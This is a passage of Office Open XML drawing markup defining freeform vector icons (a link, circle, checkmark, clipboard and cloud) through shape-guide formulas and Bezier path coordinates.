                  <a:gd name="T20" fmla="*/ 28 w 50"/>
                  <a:gd name="T21" fmla="*/ 5 h 20"/>
                  <a:gd name="T22" fmla="*/ 40 w 50"/>
                  <a:gd name="T23" fmla="*/ 5 h 20"/>
                  <a:gd name="T24" fmla="*/ 45 w 50"/>
                  <a:gd name="T25" fmla="*/ 10 h 20"/>
                  <a:gd name="T26" fmla="*/ 45 w 50"/>
                  <a:gd name="T27" fmla="*/ 10 h 20"/>
                  <a:gd name="T28" fmla="*/ 40 w 50"/>
                  <a:gd name="T29" fmla="*/ 15 h 20"/>
                  <a:gd name="T30" fmla="*/ 35 w 50"/>
                  <a:gd name="T31" fmla="*/ 15 h 20"/>
                  <a:gd name="T32" fmla="*/ 32 w 50"/>
                  <a:gd name="T33" fmla="*/ 20 h 20"/>
                  <a:gd name="T34" fmla="*/ 40 w 50"/>
                  <a:gd name="T35" fmla="*/ 20 h 20"/>
                  <a:gd name="T36" fmla="*/ 50 w 50"/>
                  <a:gd name="T37" fmla="*/ 10 h 20"/>
                  <a:gd name="T38" fmla="*/ 32 w 50"/>
                  <a:gd name="T39" fmla="*/ 10 h 20"/>
                  <a:gd name="T40" fmla="*/ 32 w 50"/>
                  <a:gd name="T41" fmla="*/ 9 h 20"/>
                  <a:gd name="T42" fmla="*/ 27 w 50"/>
                  <a:gd name="T43" fmla="*/ 9 h 20"/>
                  <a:gd name="T44" fmla="*/ 28 w 50"/>
                  <a:gd name="T45" fmla="*/ 10 h 20"/>
                  <a:gd name="T46" fmla="*/ 28 w 50"/>
                  <a:gd name="T47" fmla="*/ 10 h 20"/>
                  <a:gd name="T48" fmla="*/ 22 w 50"/>
                  <a:gd name="T49" fmla="*/ 15 h 20"/>
                  <a:gd name="T50" fmla="*/ 10 w 50"/>
                  <a:gd name="T51" fmla="*/ 15 h 20"/>
                  <a:gd name="T52" fmla="*/ 5 w 50"/>
                  <a:gd name="T53" fmla="*/ 10 h 20"/>
                  <a:gd name="T54" fmla="*/ 5 w 50"/>
                  <a:gd name="T55" fmla="*/ 10 h 20"/>
                  <a:gd name="T56" fmla="*/ 10 w 50"/>
                  <a:gd name="T57" fmla="*/ 5 h 20"/>
                  <a:gd name="T58" fmla="*/ 16 w 50"/>
                  <a:gd name="T59" fmla="*/ 5 h 20"/>
                  <a:gd name="T60" fmla="*/ 19 w 50"/>
                  <a:gd name="T61" fmla="*/ 0 h 20"/>
                  <a:gd name="T62" fmla="*/ 10 w 50"/>
                  <a:gd name="T63" fmla="*/ 0 h 20"/>
                  <a:gd name="T64" fmla="*/ 0 w 50"/>
                  <a:gd name="T65" fmla="*/ 10 h 20"/>
                  <a:gd name="T66" fmla="*/ 0 w 50"/>
                  <a:gd name="T67" fmla="*/ 10 h 20"/>
                  <a:gd name="T68" fmla="*/ 10 w 50"/>
                  <a:gd name="T69" fmla="*/ 20 h 20"/>
                  <a:gd name="T70" fmla="*/ 22 w 50"/>
                  <a:gd name="T71" fmla="*/ 20 h 20"/>
                  <a:gd name="T72" fmla="*/ 32 w 50"/>
                  <a:gd name="T73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0">
                    <a:moveTo>
                      <a:pt x="50" y="10"/>
                    </a:move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5"/>
                      <a:pt x="46" y="0"/>
                      <a:pt x="4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3" y="0"/>
                      <a:pt x="18" y="5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1"/>
                      <a:pt x="18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7"/>
                      <a:pt x="25" y="5"/>
                      <a:pt x="28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3" y="5"/>
                      <a:pt x="45" y="7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3"/>
                      <a:pt x="43" y="15"/>
                      <a:pt x="40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4" y="17"/>
                      <a:pt x="33" y="18"/>
                      <a:pt x="32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6" y="20"/>
                      <a:pt x="50" y="15"/>
                      <a:pt x="50" y="10"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="32" y="10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9"/>
                      <a:pt x="28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3"/>
                      <a:pt x="25" y="15"/>
                      <a:pt x="22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7" y="15"/>
                      <a:pt x="5" y="13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7"/>
                      <a:pt x="7" y="5"/>
                      <a:pt x="10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3"/>
                      <a:pt x="17" y="1"/>
                      <a:pt x="19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5"/>
                      <a:pt x="5" y="20"/>
                      <a:pt x="10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8" y="20"/>
                      <a:pt x="32" y="15"/>
                      <a:pt x="3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8" name="Freeform 19">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57008B01-CB99-4ECA-ADA9-9EC4BDC4B9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18522" y="2912132"/>
                <a:ext cx="172245" cy="168330"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 27 w 54"/>
                  <a:gd name="T1" fmla="*/ 0 h 53"/>
                  <a:gd name="T2" fmla="*/ 0 w 54"/>
                  <a:gd name="T3" fmla="*/ 27 h 53"/>
                  <a:gd name="T4" fmla="*/ 27 w 54"/>
                  <a:gd name="T5" fmla="*/ 53 h 53"/>
                  <a:gd name="T6" fmla="*/ 54 w 54"/>
                  <a:gd name="T7" fmla="*/ 27 h 53"/>
                  <a:gd name="T8" fmla="*/ 27 w 54"/>
                  <a:gd name="T9" fmla="*/ 0 h 53"/>
                  <a:gd name="T10" fmla="*/ 16 w 54"/>
                  <a:gd name="T11" fmla="*/ 43 h 53"/>
                  <a:gd name="T12" fmla="*/ 17 w 54"/>
                  <a:gd name="T13" fmla="*/ 38 h 53"/>
                  <a:gd name="T14" fmla="*/ 7 w 54"/>
                  <a:gd name="T15" fmla="*/ 24 h 53"/>
                  <a:gd name="T16" fmla="*/ 13 w 54"/>
                  <a:gd name="T17" fmla="*/ 12 h 53"/>
                  <a:gd name="T18" fmla="*/ 27 w 54"/>
                  <a:gd name="T19" fmla="*/ 7 h 53"/>
                  <a:gd name="T20" fmla="*/ 41 w 54"/>
                  <a:gd name="T21" fmla="*/ 12 h 53"/>
                  <a:gd name="T22" fmla="*/ 47 w 54"/>
                  <a:gd name="T23" fmla="*/ 24 h 53"/>
                  <a:gd name="T24" fmla="*/ 37 w 54"/>
                  <a:gd name="T25" fmla="*/ 38 h 53"/>
                  <a:gd name="T26" fmla="*/ 38 w 54"/>
                  <a:gd name="T27" fmla="*/ 43 h 53"/>
                  <a:gd name="T28" fmla="*/ 27 w 54"/>
                  <a:gd name="T29" fmla="*/ 47 h 53"/>
                  <a:gd name="T30" fmla="*/ 16 w 54"/>
                  <a:gd name="T31" fmla="*/ 43 h 53"/>
                  <a:gd name="T32" fmla="*/ 29 w 54"/>
                  <a:gd name="T33" fmla="*/ 33 h 53"/>
                  <a:gd name="T34" fmla="*/ 30 w 54"/>
                  <a:gd name="T35" fmla="*/ 35 h 53"/>
                  <a:gd name="T36" fmla="*/ 30 w 54"/>
                  <a:gd name="T37" fmla="*/ 38 h 53"/>
                  <a:gd name="T38" fmla="*/ 29 w 54"/>
                  <a:gd name="T39" fmla="*/ 40 h 53"/>
                  <a:gd name="T40" fmla="*/ 25 w 54"/>
                  <a:gd name="T41" fmla="*/ 40 h 53"/>
                  <a:gd name="T42" fmla="*/ 24 w 54"/>
                  <a:gd name="T43" fmla="*/ 38 h 53"/>
                  <a:gd name="T44" fmla="*/ 24 w 54"/>
                  <a:gd name="T45" fmla="*/ 35 h 53"/>
                  <a:gd name="T46" fmla="*/ 25 w 54"/>
                  <a:gd name="T47" fmla="*/ 33 h 53"/>
                  <a:gd name="T48" fmla="*/ 26 w 54"/>
                  <a:gd name="T49" fmla="*/ 10 h 53"/>
                  <a:gd name="T50" fmla="*/ 28 w 54"/>
                  <a:gd name="T51" fmla="*/ 10 h 53"/>
                  <a:gd name="T52" fmla="*/ 29 w 54"/>
                  <a:gd name="T53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" h="53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1"/>
                      <a:pt x="12" y="53"/>
                      <a:pt x="27" y="53"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="53"/>
                      <a:pt x="54" y="41"/>
                      <a:pt x="54" y="27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  <a:moveTo>
                      <a:pt x="16" y="43"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="42"/>
                      <a:pt x="17" y="40"/>
                      <a:pt x="17" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="32"/>
                      <a:pt x="13" y="26"/>
                      <a:pt x="7" y="24"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="20"/>
                      <a:pt x="10" y="16"/>
                      <a:pt x="13" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="9"/>
                      <a:pt x="22" y="7"/>
                      <a:pt x="27" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="7"/>
                      <a:pt x="37" y="9"/>
                      <a:pt x="41" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="16"/>
                      <a:pt x="46" y="20"/>
                      <a:pt x="47" y="24"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="26"/>
                      <a:pt x="37" y="32"/>
                      <a:pt x="37" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="40"/>
                      <a:pt x="37" y="42"/>
                      <a:pt x="38" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="45"/>
                      <a:pt x="31" y="47"/>
                      <a:pt x="27" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="47"/>
                      <a:pt x="19" y="45"/>
                      <a:pt x="16" y="43"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="29" y="33"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="33"/>
                      <a:pt x="30" y="34"/>
                      <a:pt x="30" y="35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9"/>
                      <a:pt x="30" y="40"/>
                      <a:pt x="29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0"/>
                      <a:pt x="24" y="39"/>
                      <a:pt x="24" y="38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4"/>
                      <a:pt x="24" y="33"/>
                      <a:pt x="25" y="33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0"/>
                      <a:pt x="28" y="10"/>
                      <a:pt x="28" y="10"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="29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29" name="Freeform 20">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BA34EBB-C78A-47A5-9FF4-B1F6DAF472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95034" y="3100035"/>
                <a:ext cx="150715" cy="121354"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 30 w 77"/>
                  <a:gd name="T1" fmla="*/ 62 h 62"/>
                  <a:gd name="T2" fmla="*/ 0 w 77"/>
                  <a:gd name="T3" fmla="*/ 31 h 62"/>
                  <a:gd name="T4" fmla="*/ 15 w 77"/>
                  <a:gd name="T5" fmla="*/ 17 h 62"/>
                  <a:gd name="T6" fmla="*/ 30 w 77"/>
                  <a:gd name="T7" fmla="*/ 33 h 62"/>
                  <a:gd name="T8" fmla="*/ 62 w 77"/>
                  <a:gd name="T9" fmla="*/ 0 h 62"/>
                  <a:gd name="T10" fmla="*/ 77 w 77"/>
                  <a:gd name="T11" fmla="*/ 15 h 62"/>
                  <a:gd name="T12" fmla="*/ 30 w 77"/>
                  <a:gd name="T13" fmla="*/ 62 h 62"/>
                  <a:gd name="T14" fmla="*/ 9 w 77"/>
                  <a:gd name="T15" fmla="*/ 31 h 62"/>
                  <a:gd name="T16" fmla="*/ 30 w 77"/>
                  <a:gd name="T17" fmla="*/ 54 h 62"/>
                  <a:gd name="T18" fmla="*/ 69 w 77"/>
                  <a:gd name="T19" fmla="*/ 15 h 62"/>
                  <a:gd name="T20" fmla="*/ 62 w 77"/>
                  <a:gd name="T21" fmla="*/ 8 h 62"/>
                  <a:gd name="T22" fmla="*/ 30 w 77"/>
                  <a:gd name="T23" fmla="*/ 41 h 62"/>
                  <a:gd name="T24" fmla="*/ 15 w 77"/>
                  <a:gd name="T25" fmla="*/ 25 h 62"/>
                  <a:gd name="T26" fmla="*/ 9 w 77"/>
                  <a:gd name="T27" fmla="*/ 3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7" h="62">
                    <a:moveTo>
                      <a:pt x="30" y="62"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="62"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="9" y="31"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="30" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9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0" name="Freeform 21">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3EA8B45-7A78-442E-B746-B7A9082822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40581" y="3336871"/>
                <a:ext cx="178118" cy="236836"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 53 w 56"/>
                  <a:gd name="T1" fmla="*/ 9 h 74"/>
                  <a:gd name="T2" fmla="*/ 49 w 56"/>
                  <a:gd name="T3" fmla="*/ 9 h 74"/>
                  <a:gd name="T4" fmla="*/ 49 w 56"/>
                  <a:gd name="T5" fmla="*/ 14 h 74"/>
                  <a:gd name="T6" fmla="*/ 51 w 56"/>
                  <a:gd name="T7" fmla="*/ 14 h 74"/>
                  <a:gd name="T8" fmla="*/ 51 w 56"/>
                  <a:gd name="T9" fmla="*/ 51 h 74"/>
                  <a:gd name="T10" fmla="*/ 32 w 56"/>
                  <a:gd name="T11" fmla="*/ 51 h 74"/>
                  <a:gd name="T12" fmla="*/ 32 w 56"/>
                  <a:gd name="T13" fmla="*/ 70 h 74"/>
                  <a:gd name="T14" fmla="*/ 5 w 56"/>
                  <a:gd name="T15" fmla="*/ 70 h 74"/>
                  <a:gd name="T16" fmla="*/ 5 w 56"/>
                  <a:gd name="T17" fmla="*/ 14 h 74"/>
                  <a:gd name="T18" fmla="*/ 7 w 56"/>
                  <a:gd name="T19" fmla="*/ 14 h 74"/>
                  <a:gd name="T20" fmla="*/ 7 w 56"/>
                  <a:gd name="T21" fmla="*/ 9 h 74"/>
                  <a:gd name="T22" fmla="*/ 2 w 56"/>
                  <a:gd name="T23" fmla="*/ 9 h 74"/>
                  <a:gd name="T24" fmla="*/ 0 w 56"/>
                  <a:gd name="T25" fmla="*/ 12 h 74"/>
                  <a:gd name="T26" fmla="*/ 0 w 56"/>
                  <a:gd name="T27" fmla="*/ 72 h 74"/>
                  <a:gd name="T28" fmla="*/ 2 w 56"/>
                  <a:gd name="T29" fmla="*/ 74 h 74"/>
                  <a:gd name="T30" fmla="*/ 39 w 56"/>
                  <a:gd name="T31" fmla="*/ 74 h 74"/>
                  <a:gd name="T32" fmla="*/ 56 w 56"/>
                  <a:gd name="T33" fmla="*/ 58 h 74"/>
                  <a:gd name="T34" fmla="*/ 56 w 56"/>
                  <a:gd name="T35" fmla="*/ 12 h 74"/>
                  <a:gd name="T36" fmla="*/ 53 w 56"/>
                  <a:gd name="T37" fmla="*/ 9 h 74"/>
                  <a:gd name="T38" fmla="*/ 37 w 56"/>
                  <a:gd name="T39" fmla="*/ 70 h 74"/>
                  <a:gd name="T40" fmla="*/ 37 w 56"/>
                  <a:gd name="T41" fmla="*/ 56 h 74"/>
                  <a:gd name="T42" fmla="*/ 51 w 56"/>
                  <a:gd name="T43" fmla="*/ 56 h 74"/>
                  <a:gd name="T44" fmla="*/ 37 w 56"/>
                  <a:gd name="T45" fmla="*/ 70 h 74"/>
                  <a:gd name="T46" fmla="*/ 46 w 56"/>
                  <a:gd name="T47" fmla="*/ 9 h 74"/>
                  <a:gd name="T48" fmla="*/ 37 w 56"/>
                  <a:gd name="T49" fmla="*/ 9 h 74"/>
                  <a:gd name="T50" fmla="*/ 37 w 56"/>
                  <a:gd name="T51" fmla="*/ 5 h 74"/>
                  <a:gd name="T52" fmla="*/ 32 w 56"/>
                  <a:gd name="T53" fmla="*/ 0 h 74"/>
                  <a:gd name="T54" fmla="*/ 23 w 56"/>
                  <a:gd name="T55" fmla="*/ 0 h 74"/>
                  <a:gd name="T56" fmla="*/ 19 w 56"/>
                  <a:gd name="T57" fmla="*/ 5 h 74"/>
                  <a:gd name="T58" fmla="*/ 19 w 56"/>
                  <a:gd name="T59" fmla="*/ 9 h 74"/>
                  <a:gd name="T60" fmla="*/ 9 w 56"/>
                  <a:gd name="T61" fmla="*/ 9 h 74"/>
                  <a:gd name="T62" fmla="*/ 9 w 56"/>
                  <a:gd name="T63" fmla="*/ 19 h 74"/>
                  <a:gd name="T64" fmla="*/ 46 w 56"/>
                  <a:gd name="T65" fmla="*/ 19 h 74"/>
                  <a:gd name="T66" fmla="*/ 46 w 56"/>
                  <a:gd name="T67" fmla="*/ 9 h 74"/>
                  <a:gd name="T68" fmla="*/ 32 w 56"/>
                  <a:gd name="T69" fmla="*/ 9 h 74"/>
                  <a:gd name="T70" fmla="*/ 23 w 56"/>
                  <a:gd name="T71" fmla="*/ 9 h 74"/>
                  <a:gd name="T72" fmla="*/ 23 w 56"/>
                  <a:gd name="T73" fmla="*/ 5 h 74"/>
                  <a:gd name="T74" fmla="*/ 23 w 56"/>
                  <a:gd name="T75" fmla="*/ 5 h 74"/>
                  <a:gd name="T76" fmla="*/ 32 w 56"/>
                  <a:gd name="T77" fmla="*/ 5 h 74"/>
                  <a:gd name="T78" fmla="*/ 32 w 56"/>
                  <a:gd name="T79" fmla="*/ 5 h 74"/>
                  <a:gd name="T80" fmla="*/ 32 w 56"/>
                  <a:gd name="T81" fmla="*/ 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6" h="74">
                    <a:moveTo>
                      <a:pt x="53" y="9"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="9"/>
                      <a:pt x="49" y="9"/>
                      <a:pt x="49" y="9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32" y="51"/>
                      <a:pt x="32" y="51"/>
                      <a:pt x="32" y="51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0" y="10"/>
                      <a:pt x="0" y="12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3"/>
                      <a:pt x="1" y="74"/>
                      <a:pt x="2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56" y="58"/>
                      <a:pt x="56" y="58"/>
                      <a:pt x="56" y="58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0"/>
                      <a:pt x="55" y="9"/>
                      <a:pt x="53" y="9"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="37" y="70"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="56"/>
                      <a:pt x="37" y="56"/>
                      <a:pt x="37" y="56"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="51" y="56"/>
                      <a:pt x="51" y="56"/>
                      <a:pt x="51" y="56"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="37" y="70"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="46" y="9"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="9"/>
                      <a:pt x="37" y="9"/>
                      <a:pt x="37" y="9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5" y="0"/>
                      <a:pt x="3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1" y="0"/>
                      <a:pt x="19" y="2"/>
                      <a:pt x="19" y="5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46" y="19"/>
                      <a:pt x="46" y="19"/>
                      <a:pt x="46" y="19"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="46" y="9"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="32" y="9"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="9"/>
                      <a:pt x="23" y="9"/>
                      <a:pt x="23" y="9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5"/>
                      <a:pt x="32" y="5"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="3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1" name="Freeform 22">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D08EE9BA-99C6-4DA1-8E98-07C066B9B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6834" y="3618727"/>
                <a:ext cx="608730" cy="342532"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 190 w 190"/>
                  <a:gd name="T1" fmla="*/ 74 h 107"/>
                  <a:gd name="T2" fmla="*/ 166 w 190"/>
                  <a:gd name="T3" fmla="*/ 43 h 107"/>
                  <a:gd name="T4" fmla="*/ 122 w 190"/>
                  <a:gd name="T5" fmla="*/ 0 h 107"/>
                  <a:gd name="T6" fmla="*/ 87 w 190"/>
                  <a:gd name="T7" fmla="*/ 17 h 107"/>
                  <a:gd name="T8" fmla="*/ 67 w 190"/>
                  <a:gd name="T9" fmla="*/ 7 h 107"/>
                  <a:gd name="T10" fmla="*/ 42 w 190"/>
                  <a:gd name="T11" fmla="*/ 32 h 107"/>
                  <a:gd name="T12" fmla="*/ 43 w 190"/>
                  <a:gd name="T13" fmla="*/ 35 h 107"/>
                  <a:gd name="T14" fmla="*/ 36 w 190"/>
                  <a:gd name="T15" fmla="*/ 35 h 107"/>
                  <a:gd name="T16" fmla="*/ 0 w 190"/>
                  <a:gd name="T17" fmla="*/ 71 h 107"/>
                  <a:gd name="T18" fmla="*/ 36 w 190"/>
                  <a:gd name="T19" fmla="*/ 107 h 107"/>
                  <a:gd name="T20" fmla="*/ 158 w 190"/>
                  <a:gd name="T21" fmla="*/ 107 h 107"/>
                  <a:gd name="T22" fmla="*/ 158 w 190"/>
                  <a:gd name="T23" fmla="*/ 107 h 107"/>
                  <a:gd name="T24" fmla="*/ 190 w 190"/>
                  <a:gd name="T25" fmla="*/ 7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0" h="107">
                    <a:moveTo>
                      <a:pt x="190" y="74"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="190" y="59"/>
                      <a:pt x="180" y="46"/>
                      <a:pt x="166" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="165" y="19"/>
                      <a:pt x="146" y="0"/>
                      <a:pt x="122" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="107" y="0"/>
                      <a:pt x="95" y="6"/>
                      <a:pt x="87" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="11"/>
                      <a:pt x="75" y="7"/>
                      <a:pt x="67" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="7"/>
                      <a:pt x="42" y="18"/>
                      <a:pt x="42" y="32"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="33"/>
                      <a:pt x="43" y="34"/>
                      <a:pt x="43" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="35"/>
                      <a:pt x="38" y="35"/>
                      <a:pt x="36" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="35"/>
                      <a:pt x="0" y="51"/>
                      <a:pt x="0" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="91"/>
                      <a:pt x="16" y="107"/>
                      <a:pt x="36" y="107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58" y="107"/>
                      <a:pt x="158" y="107"/>
                      <a:pt x="158" y="107"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="176" y="107"/>
                      <a:pt x="190" y="92"/>
                      <a:pt x="190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:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6FFA4318-8D52-4047-A095-C91AB0E4E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2752" y="2722270"/>
                <a:ext cx="291643" cy="317087"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 61 w 91"/>
                  <a:gd name="T1" fmla="*/ 27 h 99"/>
                  <a:gd name="T2" fmla="*/ 51 w 91"/>
                  <a:gd name="T3" fmla="*/ 38 h 99"/>
                  <a:gd name="T4" fmla="*/ 46 w 91"/>
                  <a:gd name="T5" fmla="*/ 46 h 99"/>
                  <a:gd name="T6" fmla="*/ 48 w 91"/>
                  <a:gd name="T7" fmla="*/ 29 h 99"/>
                  <a:gd name="T8" fmla="*/ 48 w 91"/>
                  <a:gd name="T9" fmla="*/ 14 h 99"/>
                  <a:gd name="T10" fmla="*/ 23 w 91"/>
                  <a:gd name="T11" fmla="*/ 4 h 99"/>
                  <a:gd name="T12" fmla="*/ 13 w 91"/>
                  <a:gd name="T13" fmla="*/ 29 h 99"/>
                  <a:gd name="T14" fmla="*/ 24 w 91"/>
                  <a:gd name="T15" fmla="*/ 40 h 99"/>
                  <a:gd name="T16" fmla="*/ 38 w 91"/>
                  <a:gd name="T17" fmla="*/ 50 h 99"/>
                  <a:gd name="T18" fmla="*/ 29 w 91"/>
                  <a:gd name="T19" fmla="*/ 48 h 99"/>
                  <a:gd name="T20" fmla="*/ 14 w 91"/>
                  <a:gd name="T21" fmla="*/ 48 h 99"/>
                  <a:gd name="T22" fmla="*/ 4 w 91"/>
                  <a:gd name="T23" fmla="*/ 74 h 99"/>
                  <a:gd name="T24" fmla="*/ 30 w 91"/>
                  <a:gd name="T25" fmla="*/ 84 h 99"/>
                  <a:gd name="T26" fmla="*/ 40 w 91"/>
                  <a:gd name="T27" fmla="*/ 73 h 99"/>
                  <a:gd name="T28" fmla="*/ 45 w 91"/>
                  <a:gd name="T29" fmla="*/ 65 h 99"/>
                  <a:gd name="T30" fmla="*/ 43 w 91"/>
                  <a:gd name="T31" fmla="*/ 96 h 99"/>
                  <a:gd name="T32" fmla="*/ 45 w 91"/>
                  <a:gd name="T33" fmla="*/ 99 h 99"/>
                  <a:gd name="T34" fmla="*/ 61 w 91"/>
                  <a:gd name="T35" fmla="*/ 92 h 99"/>
                  <a:gd name="T36" fmla="*/ 78 w 91"/>
                  <a:gd name="T37" fmla="*/ 84 h 99"/>
                  <a:gd name="T38" fmla="*/ 76 w 91"/>
                  <a:gd name="T39" fmla="*/ 81 h 99"/>
                  <a:gd name="T40" fmla="*/ 53 w 91"/>
                  <a:gd name="T41" fmla="*/ 61 h 99"/>
                  <a:gd name="T42" fmla="*/ 61 w 91"/>
                  <a:gd name="T43" fmla="*/ 63 h 99"/>
                  <a:gd name="T44" fmla="*/ 77 w 91"/>
                  <a:gd name="T45" fmla="*/ 63 h 99"/>
                  <a:gd name="T46" fmla="*/ 87 w 91"/>
                  <a:gd name="T47" fmla="*/ 37 h 99"/>
                  <a:gd name="T48" fmla="*/ 61 w 91"/>
                  <a:gd name="T49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99">
                    <a:moveTo>
                      <a:pt x="61" y="27"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="56" y="29"/>
                      <a:pt x="52" y="33"/>
                      <a:pt x="51" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="50" y="40"/>
                      <a:pt x="48" y="43"/>
                      <a:pt x="46" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="41"/>
                      <a:pt x="47" y="33"/>
                      <a:pt x="48" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="50" y="25"/>
                      <a:pt x="50" y="19"/>
                      <a:pt x="48" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="4"/>
                      <a:pt x="32" y="0"/>
                      <a:pt x="23" y="4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="8"/>
                      <a:pt x="9" y="20"/>
                      <a:pt x="13" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="35"/>
                      <a:pt x="19" y="38"/>
                      <a:pt x="24" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="41"/>
                      <a:pt x="34" y="46"/>
                      <a:pt x="38" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="34" y="49"/>
                      <a:pt x="31" y="49"/>
                      <a:pt x="29" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="46"/>
                      <a:pt x="19" y="46"/>
                      <a:pt x="14" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="52"/>
                      <a:pt x="0" y="64"/>
                      <a:pt x="4" y="74"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="84"/>
                      <a:pt x="20" y="88"/>
                      <a:pt x="30" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="82"/>
                      <a:pt x="38" y="77"/>
                      <a:pt x="40" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="70"/>
                      <a:pt x="42" y="67"/>
                      <a:pt x="45" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="50" y="77"/>
                      <a:pt x="48" y="89"/>
                      <a:pt x="43" y="96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68" y="80"/>
                      <a:pt x="58" y="74"/>
